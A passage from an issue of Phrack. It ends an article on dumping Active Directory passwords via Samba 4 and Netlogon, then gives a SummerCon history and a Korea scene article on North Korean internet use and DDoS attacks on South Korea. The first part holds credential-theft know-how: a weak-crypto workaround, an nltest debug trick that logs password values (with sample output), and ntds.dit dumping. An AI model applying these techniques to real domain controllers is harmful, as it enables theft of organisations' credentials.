NetrServerAuthenticate(). In return, the server will set this parameter to
|
|
provide his own capabilities. This is the way that they both agree on the
|
|
algorithm used to compute the session key.
|
|
|
|
There are basically three types of session keys (see section 3.1.4.3 of
|
|
[10]):
|
|
|
|
1/ AES (strong)
|
|
2/ 'Strong-Key' which is HMAC-MD5 based (weaker)
|
|
3/ DES (weak)
|
|
|
|
The third one is implemented in S4's NlMakeSessionKey() and is also the
|
|
oldest. For compatibility purposes, Windows 2003 is still accepting this
|
|
weak way of computing keys. This explains why the authentication process
|
|
was OK. Starting with Windows 2008, security has been enhanced and the
|
|
minimum required by default is now Strong-Key; I implemented it and the
|
|
authentication is now compatible with Windows 2008 :]
|
|
|
|
<Note>
|
|
There exists a workaround (Hi D.) to keep using a weak DES session key with
|
|
a Windows 2008 server. Google() the key words "NT4Emulator" and
|
|
"AllowNT4Crypto" for more details (also have a look at the GPO).
|
|
</Note>
|
|
|
|
Unfortunately this was not sufficient as NetrDatabaseSync() was now
|
|
returning a STATUS_NOT_SUPPORTED. Digging in "[MS-NRPC]: Netlogon Remote
|
|
Protocol Specification" I found the following explanation (rev 24):
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
If a server does not support a specific Netlogon RPC method, it MUST return
|
|
ERROR_NOT_SUPPORTED or STATUS_NOT SUPPORTED, based on the return type
|
|
---------------------------------------------------------------------------
|
|
|
|
The revision is important because in revision 22 NetrDatabaseSync() is
|
|
documented whereas it's not anymore in revision 24. It mysteriously
|
|
disappeared... If we consider the previous quote, it seems fair to assume
|
|
that at some point the function was declared deprecated. Unfortunately the
|
|
reason is probably mentioned in revision 23 which seems currently
|
|
unavailable. Who knows, we might some day have the appropriate explanation.
|
|
However "deprecated" doesn't mean "gone" so it *might* be interesting to
|
|
reverse engineer the function ;]
|
|
|
|
Btw a little trick to help you:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\Users\Administrator>nltest /dbflag:ffffffff
|
|
SYSTEM\CurrentControlSet\Services\Netlogon\Parameters set to 0xffffffff
|
|
Flags: 0
|
|
Connection Status = 0 0x0 NERR_Success
|
|
The command completed successfully
|
|
|
|
C:\Users\Administrator>type %WINDIR%\debug\netlogon.log
|
|
[...]
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: DC10$: Message
|
|
: dbcbaafc aba49ab9 f6bcabb5 62380816 ..............8b
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: New Password:
|
|
b6b852a3 5ec54dc9 9ea3917e c51d19fa .R...M.^~.......
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: New Digest: d4
|
|
67786d a92bd731 7da18262 3d1cdb4f mxg.1.+.b..}O..=
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: Old Password:
|
|
b6b852a3 5ec54dc9 9ea3917e c51d19fa .R...M.^~.......
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: Old Digest: d4
|
|
67786d a92bd731 7da18262 3d1cdb4f mxg.1.+.b..}O..=
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
---[ 8 - Additional details
|
|
|
|
|
|
a) Are there other alternatives to dump the AD's passwords?
|
|
|
|
Well apart from pwdump-like techniques, there is at least one more:
|
|
ntds.dit [11] file dumping. In a nutshell, this file is a Jet Blue database
|
|
holding (amongst other things) information about the users. When an LDAP
|
|
query is issued, this database is interrogated. Because it's very sensitive
|
|
(passwords are stored inside), it's both encrypted and system locked thus
|
|
it's not trivial to dump its content. I wasn't aware until recently of any
|
|
tool able to deal with it. It seems that things have changed because I've
|
|
heard some rumors. There should be at least two other alternatives, but I
|
|
won't say more. Be smart and find them yourself :]
|
|
|
|
b) What about real-life filtering & the requirement of 2 DCs??
|
|
|
|
The first requirement for the attack is the ability to execute arbitrary
|
|
commands on one of the DCs. One is enough as by design all of them are
|
|
communicating with one another without any restrictions (=filtering).
|
|
|
|
The second requirement is the existence of at least 2 DCs. Apart from tiny
|
|
corporations, there will always be at least 2 DCs (for business continuity
|
|
in case of a disaster or maintenance operation) so it's no big deal either.
|
|
|
|
|
|
c) What about Samba 4 .VS. Windows 2008?
|
|
|
|
Well, have a look at samba-4.0.0alpha18.tgz :]
|
|
|
|
|
|
---[ 9 - Last words
|
|
|
|
|
|
The original title of the paper was something like:
|
|
"The art of the laziness: exploiting the Samba 4 project"
|
|
|
|
What I wanted to highlight is that sometimes with only a few ideas and
|
|
minimal efforts you can come up with new tools & techniques. Read the S4
|
|
source code, test it, improve it and use it wisely. As they all say:
|
|
|
|
Happy Hacking! :-]
|
|
|
|
-- High 5 to my fellows
|
|
|
|
---[ 10 - Bibliography
|
|
|
|
|
|
[01] http://en.wikipedia.org/wiki/Pwdump
|
|
[02] http://en.wikipedia.org/wiki/Active_Directory
|
|
[03] http://wiki.samba.org/index.php/Samba4
|
|
[04] http://securite.intrinsec.com/2010/09/07/
|
|
rd-outil-dextraction-de-mots-de-passe-ad/
|
|
[05] http://msdn.microsoft.com/en-us/library/cc237290%28v=prot.13%29.aspx
|
|
[06] http://en.wikipedia.org/wiki/Primary_Domain_Controller
|
|
[07] http://www.microsoft.com/download/en/details.aspx?id=16770
|
|
[08] http://msdn.microsoft.com/en-us/library/cc237225%28v=prot.13%29.aspx
|
|
[09] http://msdn.microsoft.com/en-us/library/cc237082%28v=prot.13%29.aspx
|
|
[10] http://msdn.microsoft.com/en-us/library/cc237008%28v=prot.10%29.aspx
|
|
[11] http://www.stoyanoff.info/blog/2012/02/11/ad-data-store-part-1/
|
|
[12] http://en.wikipedia.org/wiki/Flexible_single_master_operation
|
|
[13] http://technet.microsoft.com/en-us/library/cc772217%28v=ws.10%29.aspx
|
|
[14] http://technet.microsoft.com/en-us/library/cc776877%28WS.10%29.aspx
|
|
|
|
|
|
---[ 11 - c0de: S4
|
|
|
|
---[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x12 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ 25 Years of SummerCon ]=----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------------------=[ by Shmeck ]=-----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
It's hard to believe that 2012 marks the 25th anniversary of SummerCon. In
|
|
the American hacking landscape, SummerCon remains the seminal conference
|
|
from which all others are modeled. In those early days, interactions
|
|
between hackers took place through BBSes, as shout-outs in assorted
|
|
textfiles, on telco voice bridges, and in the pages of Phrack and 2600. For
|
|
the most part, these interactions were all mediated through some kind of
|
|
communications infrastructure. SummerCon was an opportunity to change that.
|
|
|
|
In the 1980s, informal gatherings of hackers had begun to spring up all
|
|
over the place in America. The European scene was well-organized, with
|
|
groups like the Chaos Computer Club holding an annual congress of hackers
|
|
as early as 1984.
|
|
|
|
There are various theories about why Europe organized more quickly than
|
|
America. America developed a strong counterculture in the 1960s and 1970s,
|
|
including an enthusiastic phreaking movement dating back to the early
|
|
1970s. Well-known anarchist and Chicago Seven conspirator Abbie Hoffman,
|
|
along with Al Bell, a well-known telephony enthusiast, launched the first
|
|
phreak magazine, YIPL: Youth International Party Line in 1971. YIPL became
|
|
TAP, based out of New York. Though Americans were enthusiastic, TAP found
|
|
an eager European audience, and Dutch and German activists carried the
|
|
torch and pushed the boundaries of phreaking in the 1970s. Those phreaks
|
|
were readily absorbed into the ranks of an already strong and
|
|
well-established anti-authoritarian movement in Europe. Large-scale
|
|
meetings, complete with technical demonstrations were the logical next
|
|
step, so the first big hacker conference, Chaos Computer Congress, took
|
|
place in Hamburg in 1984.
|
|
|
|
American hackers remained active during that period, but physical meetings
|
|
remained elusive. Nevertheless, something like a tipping point for the
|
|
American hacking scene must have occurred in the summer of 1987. On June 5
|
|
of that year, the first 2600 meeting was held in New York City. Only two
|
|
weeks later, in St. Louis, a small cadre of people who mostly knew each
|
|
other from exchanges on Metal Shop BBS and through Phrack profiles, met at
|
|
the Executive International Best Western to embark on a totally new way to
|
|
advance the American hacking agenda. The first SummerCon set the stage for
|
|
the way subsequent hacker conferences would be held. To this day PumpCon,
|
|
HoHoCon, DEFCON, and HOPE stick to the same formula.
|
|
|
|
Its organizers wanted to foster the physical interaction in meatspace,
|
|
eschewing the phosphorescent glow of their CRTs to hold a party like none
|
|
other. Mostly, if the reports from early editions of Phrack are to be
|
|
believed, though, it was to have a good time. SummerCon has always held its
|
|
primary goal as forging friendships, because that's how real dialogue and
|
|
information exchange happens. Yes, there were technical talks. That first
|
|
SummerCon in 1987 included a long list of technical discussions, but
|
|
because it was a small gathering, the agenda was ad hoc and seemingly
|
|
freeform.
|
|
|
|
Most of the technical discussions centered on things that are pretty far
|
|
outside modern mainstream infosec discourse: BBSes, fiber optics, and
|
|
methods of blowing 2600 Hertz headlined the proceedings. In fact, the
|
|
attendees had a hard time getting started, not really knowing each other or
|
|
how to begin. But because everyone in attendance had some sort of technical
|
|
background, these purely technical discussions got people talking to each
|
|
other, which led to drinking, which led to partying, which, ultimately
|
|
helped the attendees forge long-lasting relationships with each other. It's
|
|
how cons have worked ever since.
|
|
|
|
The success of that first SummerCon naturally implied that another one
|
|
would be held the following year. Its organizers made a last-minute
|
|
decision to hold another one. Like modern incarnations of SummerCon, the
|
|
organizers dithered over details like location, letting inertia play a
|
|
significant role. While New York City was one possible contender, it was
|
|
held in St. Louis again.
|
|
|
|
SummerCon '88 was a controversial one. The technical discussions came a
|
|
little more easily, and the attendees seemed a little more comfortable,
|
|
inviting outsiders into their ranks. But one attendee, Dale Drew, using the
|
|
handle "The Dictator", was actually an informant working with the Secret
|
|
Service. He helped government agents videotape the proceedings through a
|
|
two-way mirror in his hotel room. This video evidence was eventually used
|
|
to indict conference organizer Knight Lightning (the nom de hack of Phrack
|
|
founder Craig Neidorf) on a federal count of criminal conspiracy as a part
|
|
of his now-infamous E911 criminal trial. Though the case against Neidorf
|
|
eventually fell apart, federal interest in SummerCon would remain an
|
|
ongoing theme for years to come. Other conferences have capitalized on
|
|
SummerCon mainstays like "Hunt the Fed", now immortalized as DEFCON's "Spot
|
|
the Fed" contest.
|
|
|
|
There was a SummerCon in 1990, but a wide federal dragnet for computer
|
|
crime and Knight Lightning's federal trial tainted it. Perhaps the most
|
|
chilling reminder of a bad era exists in the announcement for a
|
|
Christmastime event in Houston called XmasCon, who stated that their event
|
|
would "replace the painful memories of SummerCon'90 (SCon'90? What do you
|
|
mean? there was a SummerCon this year? HA. It surprised me too)." Clearly,
|
|
these were bad times in the hacker community.
|
|
|
|
In 1991, the freshly acquitted Knight Lightning rebranded SummerCon as
|
|
"CyberView," because he did not want to trigger any associations with the
|
|
previous event. Bruce Sterling's comprehensive report (Phrack 33:10,
|
|
http://www.phrack.org/issues.html?issue=33&id=10#article) included a
|
|
rationale for the new, if short-lived name. "The convention hotel, a seedy
|
|
but accommodating motor-inn outside the airport in St Louis, had hosted
|
|
SummerCons before. Changing the name had been a good idea. If the staff
|
|
were alert, and actually recognized that these were the same kids back
|
|
again, things might get hairy." In what can only be described as a
|
|
SummerCon miracle, a St. Louis swingers' group simultaneously occupied the
|
|
conference hotel. As with every SummerCon, booze was a factor.
|
|
|
|
SummerCon 92 saw a dramatic increase in the number of participants, with 73
|
|
reportedly in attendance. Summercon 93 was the last year a SummerCon took
|
|
place in St. Louis. Summercon 95 marked a changing of the guard, with the
|
|
event taking place in Atlanta, hosted by Erik Bloodaxe and his LoD
|
|
colleagues. Over 200 hackers came; several were arrested. The following
|
|
year, SummerCon 96 moved to Washington, DC.
|
|
|
|
Periodically moving the conference became a ritual to prevent the event
|
|
from getting too stale and to ensure that a willing hotel could be found,
|
|
since SummerCon had a reputation of being a rowdy conference. The move to
|
|
Washington, D.C. offered an easy venue for members of the East Coast hacker
|
|
community; members of L0pht came in from Boston, hackers from Pittsburgh
|
|
had a simple commute, and the NYC scene was well represented. The local law
|
|
enforcement community was in full force as well, with several raids taking
|
|
place during the event.
|
|
|
|
During that time period, the organizers of SummerCon were losing enthusiasm
|
|
for running the event. It is a thankless job, and requires coordinating a
|
|
tremendous number of people, places, and event staff, all while keeping law
|
|
enforcement officials at bay. During Summercon 97 in Atlanta, a stalwart of
|
|
the DC hacking community going by the handle Clovis convinced the current
|
|
organizers to transfer the domain name to him so that he could take over
|
|
the organizational aspects of the conference. It was a relief to the
|
|
current organizers, who were frankly happy to be done with the annual
|
|
headache.
|
|
|
|
In 1998, Clovis, leaning heavily on his younger brother for organizational
|
|
support, threw SummerCon in Atlanta. For the next three years, SummerCon
|
|
would be held in Atlanta, though SummerCon 2000 was notable because the
|
|
hotel that was slated to host it conveniently lost contracts for the event
|
|
the day before it was to take place, leaving Clovis no rooms for technical
|
|
discussions. The nonplussed attendees set up shop in the Omni CNN Center
|
|
Hotel bar, where ad hoc presentations took place, much to the consternation
|
|
of hotel guest who did not expect to get a dose of information security
|
|
discourse over their cocktails. The hotel that originally objected to
|
|
hosting a hacker conference, did not mind the steady stream of bar sales
|
|
one bit.
|
|
|
|
Clovis had ambitious plans for SummerCon. For 2001, envisioned a global
|
|
conference, which would draw an audience from around the world. He thought
|
|
Amsterdam would be a good location, and looked into bulking up the
|
|
technical backend of the event. For the first time SummerCon would be shown
|
|
live through a RealStream video server to anyone who wanted to watch.
|
|
|
|
It was daunting. Everything was expensive. Clovis' younger brother had to
|
|
figure out a mountain of customs paperwork to ship all the t-shirts and
|
|
conference badges overseas. In short, every part of SummerCon 2001 was an
|
|
enormous headache, but in the end it was a fantastic event.
|
|
|
|
About 200 attendees descended on Amsterdam to try an American-style hacker
|
|
conference. It was very different than the Chaos Computer Club congresses,
|
|
and nothing at all like the Dutch hacking camp HAL. Many attendees didn't
|
|
understand why it was held at such an expensive hotel. But the global
|
|
breadth of attendees and speakers was impressive, and it was generally
|
|
considered to be a successful conference by all who attended or watched
|
|
online. The hotel, though pricey, was incredibly easy to work with and
|
|
provided a safe, enjoyable environment in a tourist-friendly part of
|
|
Amsterdam.
|
|
|
|
But Clovis' brother, weary from filling out customs forms, was not so
|
|
enamored with the idea of doing SummerCon overseas again, and so SummerCon
|
|
2002 took place in Washington, D.C. Unlike the affable and easy-going Dutch
|
|
hotel support staff a year prior, the sales director of the Renaissance
|
|
Washington D.C. had little patience for the SummerCon organizers. Not
|
|
mincing words, she announced to Clovis and his staff, "I know about you
|
|
guys. I know about hacker conferences. If anything happens at this hotel,
|
|
any kind of funny business, I will throw you all out. We have Presidents of
|
|
the United States here. I will throw you out." This was six hours before
|
|
the conference was slated to begin. In spite of her concerns, the
|
|
conference was successful, the hotel bar did brisk business, and nobody got
|
|
arrested.
|
|
|
|
SummerCon enjoyed a stand in Pittsburgh for two years where Redpantz became
|
|
a member of the planning committee and began to emcee. In these years,
|
|
SummerCon began to select venues based on how agreeable the bar staff was,
|
|
because, all things being equal, SummerCon is, in the words of the noted
|
|
hacker X, "also about drinking a lot of beer." There were several alcohol
|
|
related incidents in Pittsburgh. One of the organizers was cited by the
|
|
Pittsburgh Police Department for "simulating a sex act," an incident that
|
|
he has never lived down. It was in this time period that members of the FBI
|
|
Cyber Division began to actually offer presentations at SummerCon. If you
|
|
can't beat 'em, join 'em.
|
|
|
|
Austin was the site of SummerCon 2005. Internal political squabbling
|
|
amongst the organizers and the lack of a clear promotional plan for
|
|
SummerCon meant that attendance was very low-perhaps even lower than the
|
|
first SummerCon. It was a boozy event and had plenty of quality technical
|
|
discussions, but only a few people showed up, including some very nice
|
|
individuals from San Antonio. Luckily, the hotel was also backed with
|
|
bikers from the annual Republic of Texas motorcycle rally, and everyone was
|
|
down to party.
|
|
|
|
Nevertheless, the organizers knew it was time to press the reset button,
|
|
and a select group was invited to SummerCon 2006 to address the ongoing
|
|
viability of the event. The organizational core agreed that the next three
|
|
years should be in Atlanta, with every effort take to rebuild the
|
|
reputation of SummerCon. That effort to rejuvenate the reputation as the
|
|
hacker conference with the highest level of technical expertise, coupled
|
|
with the heaviest intake of alcohol per attendee was well received by the
|
|
organizational core and future attendees. It was an old formula, and a
|
|
return to our roots: offer great presentations to get the conversation
|
|
going, and keep everyone as drunk as possible.
|
|
|
|
SummerCons in Atlanta were predictably rowdy; in 2007 Billy Hoffman did his
|
|
best to finish his presentation, and slurred the words, "If I'm not making
|
|
any sense ya'll just throw a shoe at me or something." Immediately, an
|
|
attendee threw a shoe that barely missed the staggering speaker, making a
|
|
loud WHUMP as it struck the projection screen. "Well, okay then..." Billy
|
|
replied, as he continued his lecture. The SummerCon organizational staff
|
|
believes that this exchange was the framework for an event that transpired
|
|
in Iraq in 2008, when an angry man threw his shoes at a surprised President
|
|
George W. Bush.
|
|
|
|
When SummerCon moved to New York City in 2010, it had a reputation as a
|
|
technical smorgasbord and a relentless booze-fest, which, honestly, is a
|
|
perfect combination. There are very few things you can do to improve on
|
|
that formula, but the SummerCon organizers found a way, by inviting a
|
|
burlesque troupe to participate in event planning and hosting an after
|
|
party.
|
|
|
|
Being located in New York City made the event to heavy-hitters in the
|
|
security industry, and the technical aspects of the conference expanded in
|
|
line with the party dynamic. In 2011, the organizers accepted some
|
|
sponsorship money, which permitted them to invest more heavily in the
|
|
presentation side of the event, flying in speakers from far-flung and
|
|
exotic places like California and Michigan. It also meant that the after
|
|
party was more outrageous, and was featured as an "Event of the Week" in
|
|
the local events newsletter "Time Out New York."
|
|
|
|
There are few things as dependable in the hacking world as SummerCon.
|
|
Though it has evolved from a small, invite-only gathering to a large,
|
|
structured conference, it has never lost sight of the importance of its
|
|
mission: bringing together the brightest minds in information security for
|
|
the best party of the year. Raise your glass, and toast another 25 years of
|
|
Summercon!
|
|
|
|
[EOF]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x13 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ International scenes ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ By Various ]=------------------------=|
|
|
|=------------------------=[ <various@nsa.gov> ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
In this issue we are glad to have an amazing scene phile about Korea. You
|
|
may find that it is a bit different from the usual scene philes, but the
|
|
content will reward you. The author gives us information that is hard to
|
|
come by and insight that illuminates widely believed misconceptions about
|
|
Korea. We also have the second part of the Greek scene phile that covers
|
|
interesting stories from that country's past. We know that Greece goes
|
|
through tough times and we hope it will make people reflect on the
|
|
situation there.
|
|
|
|
Trying to define what 'a scene' is, it's not unlike trying to define what
|
|
'the Underground' is. Perhaps it is that fleeting moment where you feel a
|
|
connection with something. A connection that transcends physical
|
|
limitations and relies only on interest and passion for, well, for anything
|
|
really.
|
|
|
|
The definition of the word 'scene' has changed quite a lot. Some years ago
|
|
the word 'scene' had a geographical connotation. That's clearly no longer
|
|
the case. Scenes are becoming increasingly, and thankfully, untethered from
|
|
physical boundaries. That's not really something new, but it has changed
|
|
the way most scenes are organized and operate.
|
|
|
|
Given that physical boundaries no longer are the central defining factor of
|
|
scenes, should Phrack continue to publish scene philes of specific
|
|
countries? Maybe the next logical step is to focus on scenes that are
|
|
defined by field, topic or interest. Maybe Phrack's 'International Scenes'
|
|
section should be changed to simply 'Scenes' and present overviews of less
|
|
known sub-scenes or communities built around specific interests.
|
|
|
|
Gentle reader, what are your thoughts?
|
|
|
|
-- The Phrack Staff
|
|
|
|
|
|
---
|
|
|
|
|
|
Some Stories in Korea
|
|
|
|
|
|
|
|
1 - Introduction
|
|
|
|
2 - Internet of North Korea
|
|
|
|
3 - Cyber capabilities of North Korea
|
|
|
|
4 - Attacks against South Korea
|
|
4.1 - 7.7 DDoS attack
|
|
4.2 - 3.4 DDoS attack
|
|
|
|
5 - Who are attackers?
|
|
|
|
6 - Some prospects
|
|
|
|
7 - References
|
|
|
|
|
|
|
|
--[ 1 - Introduction
|
|
The Korean Peninsula has been divided into two countries for more than
|
|
sixty years. With the ideological dispute of left and right wings that must
|
|
have been one of the biggest reasons, the political, economic, geographic,
|
|
and military factors also played an important role here. It is true that
|
|
this division system may be affected by the political, economic, and
|
|
military purpose of the two Koreas, neighboring countries, and their
|
|
allies.
|
|
|
|
This situation has caused many tragedies to the people of two Koreas, and
|
|
has made a various types of tension factors like forcing North Korea to
|
|
develop nuclear weapons to keep her system in the changing flow of the
|
|
world. Unlike the past whose main element of conflicts came from
|
|
ideological one, some large movements trying to maintain their interests
|
|
dominate the situation of the peninsula.
|
|
|
|
Over the past decade, the tension between South Korea and North Korea has
|
|
been alleviated thanks to the Sunshine Policy during the regime of two
|
|
progressive governments. However, after the present ruling party
|
|
representing conservative value took over the regime again, the tension
|
|
relationship began once again and there were some physical conflicts. It
|
|
will be almost impossible to get over this situation only with the
|
|
intention and endeavor of two Koreas, because there are so many
|
|
stakeholders.
|
|
|
|
This article will mainly focus on the internet and cyber capabilities of
|
|
North Korea which seem to be not widely known to people, and some attacks
|
|
against South Korea. So, this will make some differences from the
|
|
traditional Phrack scenes. But I think the differences don't come from
|
|
contents but form.
|
|
|
|
|
|
--[ 2 - Internet of North Korea
|
|
It is said that the internet of North Korea was introduced in the early
|
|
1990s. Mainly because of internal political reasons, the internet has been
|
|
maintained in the form of intranet.
|
|
|
|
In January 1997, North Korea opened the first web site of hers, kcna.co.jp
|
|
in Japan and opened dprkorea.com which was for business in February 1999.
|
|
And then NK opened the web site, silibank.com for international e-mail
|
|
relay. Interestingly, whois lookup will show you that the e-mail account of
|
|
Technical Contact of this domain is gmail. It is known to gain access to
|
|
this e-mail relay system is blocked in South Korea. The service is
|
|
available only to foreigners who joined the paid membership, and people and
|
|
companies of NK registered in the system.[1] The e-mail exchange with
|
|
foreigners are allowed but it is said NK authorities check the contents, so
|
|
the privacy of information will not be guaranteed.
|
|
|
|
The internet access from inside of NK to outside is very limited, but the
|
|
intranet connection built inside of NK is active. In October 2002, the
|
|
building of intranet network which allows connection from all areas of NK
|
|
was completed. It is called `Kwangmyoung' and started as a research system
|
|
of scientific knowledge materials. It is known that the access to outside
|
|
using this intranet system is impossible.
|
|
|
|
However, DPS(Department of Postal Service, `Chesinseong' in Korean) of NK
|
|
hires and manages internet access lines in Beijing of China for their use.
|
|
It is possible to connect to outside through this internet line. But it is
|
|
not freely available to all NK people. There are some people who guess
|
|
there are special lines dedicated only to Communist Party and its army in
|
|
addition to this line. But any proven materials or information through the
|
|
technical identification has not been publicly offered yet.
|
|
|
|
NK has been expanding her commercial web sites for the sake of economic
|
|
interests and system propaganda, and most of them use servers located in
|
|
foreign countries. It seems that the web sites opened in the early 2000s
|
|
have been changed and even disappeared. This may be because NK got a
|
|
permission for her to use her national domain `kp' from ICANN(Internet
|
|
Corporation for Assigned Names and Numbers) on September 11, 2007. NK has
|
|
been opening additional web sites by using kp and will add more. KCC(Korea
|
|
Computer Center) was chosen as a NK internet address management authority.
|
|
It seems that NK will open her internet system to the world when she
|
|
establishes security system and policy by herself, and can control the
|
|
internet use of people.
|
|
|
|
The access to the NK web sites for system propaganda like naenara.com.kp
|
|
and star.edu.kp is not permitted in South Korea but it is possible for us
|
|
to gain access by using Tor and proxy servers. Some of web sites operated
|
|
directly in NK were known in the past, but they were accessible through not
|
|
domain address system but IP address. However, it is not sure they are
|
|
operated now or they are accessible only from specific regions.
|
|
|
|
NK also makes use of SNS services like twitter(@uriminzok) mainly for
|
|
propagating her system, giving news about NK, and criticizing South Korea.
|
|
|
|
|
|
--[ 3 - Cyber Capabilities of North Korea
|
|
It was the magazine "Shindonga"(November 2005) and `2005 Defense
|
|
Information Security Conference' that introduced cyber capabilities of NK.
|
|
A related news article about the conference contains the following part,
|
|
"The capability of NK hackers is similar to CIA's."[2] But the main parts
|
|
of this article were introduced without objective data, so they were not
|
|
supposed to be reliable facts.
|
|
|
|
NK Intellectual Solidarity which consists of NK defectors having a
|
|
right-wing inclination insists that the scale of NK cyber hacker troop has
|
|
been on the increase to the level of 3,000 people.[3] But this is not
|
|
confirmed by objective data, so the confidence level is very low.
|
|
|
|
DigitalTimes cited American experts, "NK cultivates more than 100 hackers
|
|
centering around Pyongyang Automation University(Mirim University in the
|
|
past) every year, and they have capabilities to hack Pacific Command and
|
|
U.S. mainland computer systems."[4] We can easily think that the world is
|
|
connected with internet, so the physical distance between U.S. and NK is
|
|
not an obstacle at all. If the computer systems of U.S. are not so secure,
|
|
even novice hackers can compromise them.
|
|
|
|
In the web site of Nosotek which is "the first western IT venture in NK",
|
|
we can find the following expression, "software engineers are selected from
|
|
the mathematics elite and learn programming from the ground-up, such as
|
|
assembler to C#, but also Linux kernel and Visual Basic macros".[5] From
|
|
this, we can see indirectly there are outstanding programmers who have
|
|
talents to be hackers.
|
|
|
|
In the case of Kim Il-Sung University, students have to take the courses of
|
|
high mathematics and programming regardless of their majors. The university
|
|
developed the following software: Intelligent Locker(Hard Disc protection
|
|
program), Worluf Anti-virus(anti-virus program), SIMNA(simulation and
|
|
system analysis program), FC 2.0(C++ program development tool). From this,
|
|
we can know that NK also conducts hacking and security research.[6]
|
|
|
|
It seems quite natural that we can easily judge there are hacker troops in
|
|
NK in this kind of network age. NK may cultivate hackers for her defense.
|
|
But we don't have to overstate or underestimate the capabilities of NK. We
|
|
should be objective more thoroughly when data is not enough for correct
|
|
judgment. Rational and reasonable policy making and practice come from
|
|
objective data and judgement based on it.
|
|
|
|
NK should also remember that her web sites, servers, and network can be
|
|
compromised, propagate malicious codes, and be used as intermediates. The
|
|
more NK opens, the more she will be attacked. The attackers will be an
|
|
organization or a country for the sake of its political and military
|
|
purposes, hacker group for hacktivism, and script kiddies for fun.
|
|
|
|
|
|
--[ 4 - Attacks against South Korea
|
|
There were two big attacks against South Korea. One is 7.7 DDoS attack(at
|
|
first, this attack started against U.S. on July 4, 2009, but led to the
|
|
attack against South Korea on July 7, so we call this `7.7 DDoS' attack in
|
|
Korea.). The other is 3.4 DDoS attack on March 4, 2011.
|
|
|
|
--[ 4.1 - 7.7 DDoS attack
|
|
The first attack of 7.7 DDoS began on July 4, 2009(Independence Day of
|
|
U.S.) and lasted for two days. The targets of this attack were 26 important
|
|
web sites of U.S. including Amazon, FAA, NASDAQ, NSA, White House. But from
|
|
the second attack(July 7 to 8), 13 web sites of Korea were added to the
|
|
target list. Administration, congress, portal, media, financial
|
|
institutions were included in the list. At this time, Chinese hackers were
|
|
suspected to be attackers.
|
|
|
|
From the third attack(July 8 to 9), there were some changes in the target
|
|
list, and the existing zombie PCs were not used any more. It seems that the
|
|
existing zombie PCs were blocked and could be no longer available for the
|
|
next attack. One of the interesting things is that there were some
|
|
government organizations which establish measures to defend against attacks
|
|
and security companies, major portal sites giving e-mail services in the
|
|
target list. From this time, NK was suspected to have done the attack. At
|
|
least, some of South Korea's conservatives wished to believe this for their
|
|
political profits.
|
|
|
|
The final attack(July 10) ended destroying data of zombie PCs which were
|
|
infected with malicious code for attacks. However, the attacker was not
|
|
identified. C&C(Command & Control) servers from numerous countries were
|
|
used for the attack. At that time, South Korea was not prepared for this
|
|
kind of big attack. Thus, South Korea couldn't avoid a confusion from the
|
|
attack for three days.
|
|
|
|
As a result, this attack made South Korea establish various policies of
|
|
preparedness against DDoS attack. Some hackers of South Korea designed ways
|
|
to cure zombie PCs using C&C servers of attackers as well as some ways of
|
|
counterattack.
|
|
|
|
--[ 4.2 - 3.4 DDoS Attack
|
|
Almost two years after 7.7 DDoS attack, a similar attack occurred at 10:00
|
|
in the morning on March 4, 2011. Like 7.7 DDoS attack, it contained
|
|
political intentions. But the techniques of attack were more advanced. The
|
|
targets were mainly the web sites of major national infrastructures of
|
|
South Korea. The web sites of legislative, judicial, administrative,
|
|
military, diplomatic, financial organizations, and intelligence agencies,
|
|
police, portal, transportation, power system were included.
|
|
|
|
The attacker used HTTP GET Flooding, UDP Flooding, ICMP Flooding, and more
|
|
than 80% was HTTP GET Flooding. And more than 110,000 zombie PCs and 700
|
|
C&C servers from 72 countries were used for attack.[7] The attacker used
|
|
P2P web sites to spread malicious codes.
|
|
|
|
After the attacker realized that his attack had been detected(the P2P web
|
|
sites were known and blocked) through the countermeasure, he added new
|
|
commands to the malicious codes. This is a different part from the past
|
|
attack. When new attacks started, the configuration of malicious code was
|
|
changed, and new files were added. Security experts faced new challenges
|
|
and needed more time to analyze them. The ending time of attacks was not
|
|
specified clearly in the configuration file. And the host file of system
|
|
was modified to prevent the update of anti-virus programs. And encryption
|
|
techniques were used to disturb analysis.
|
|
|
|
However, new defense systems which had been established since 7.7 DDoS
|
|
attack were applied and despite more advanced techniques of attack, the
|
|
damage decreased. One day before the attack, ASD(AhnLab Smart Defense)
|
|
system collected malicious codes which would be used for attack and
|
|
analyzed the code. Through this analysis, the exact time and targets of
|
|
attack came to be known, and more effective response was possible.
|
|
|
|
South Korea has already established some important response systems since
|
|
7.7 DDoS attack. The typical examples are ASD of AhnLab and DDoS Shield of
|
|
KISA. As I said, ASD system can detect attack before it occurs by
|
|
collecting malicious codes and analyzing them. DDoS Shield system detects
|
|
attacking traffics and relays normal traffics to their destinations and
|
|
throws away abnormal attacking traffics through DNS record modification. Of
|
|
course, the cooperation system of various related organizations and
|
|
security companies was established elaborately. In this respect, these two
|
|
attacks made South Korea build new defense systems and brought the
|
|
development of the security industry.
|
|
|
|
This attack was so political but the attacker didn't reveal his exact base
|
|
intentions. But it is clear that the attacker wanted to test his techniques
|
|
of attack and judge the response capabilities of South Korea. The attacker
|
|
might realize what kinds of things he needs for his next successful attack.
|
|
Maybe, we can judge the real capabilities of the attacker through the next
|
|
attack.
|
|
|
|
|
|
--[ 5 - Who are attackers?
|
|
One of the questions which people are curious about is "who are
|
|
attackers?". This is an important question related with political and
|
|
